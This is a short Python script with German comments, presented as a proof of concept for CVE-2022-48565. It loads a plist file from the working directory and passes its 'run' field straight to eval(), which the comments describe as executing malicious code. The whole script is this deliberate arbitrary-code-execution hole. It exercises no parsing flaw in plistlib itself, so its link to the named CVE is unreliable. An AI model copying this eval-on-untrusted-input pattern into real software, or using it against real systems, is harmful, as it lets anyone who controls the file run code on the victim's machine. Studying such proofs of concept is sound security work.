# -*- coding: utf-8 -*-

#####################################
#CVE-2022-48565 POC by Einstein2150 #
#####################################

import plistlib
import os

# Pfad zur Plist-Datei im aktuellen Arbeitsverzeichnis
plist_file_path = os.path.join(os.getcwd(), 'config.plist')

# Versucht, die bösartige Plist-Datei aus dem Arbeitsverzeichnis zu laden
try:
    # Öffnen und Laden der Plist-Datei als Dateiobjekt
    with open(plist_file_path, 'rb') as plist_file:
        # plistlib.readPlist() erwartet ein Dateiobjekt
        plist_data = plistlib.readPlist(plist_file)
    
    # Führe den bösartigen Code aus der externen plist-Datei aus
    eval(plist_data['run'])
except Exception as e:
    print("Ein Fehler ist aufgetreten: ", e)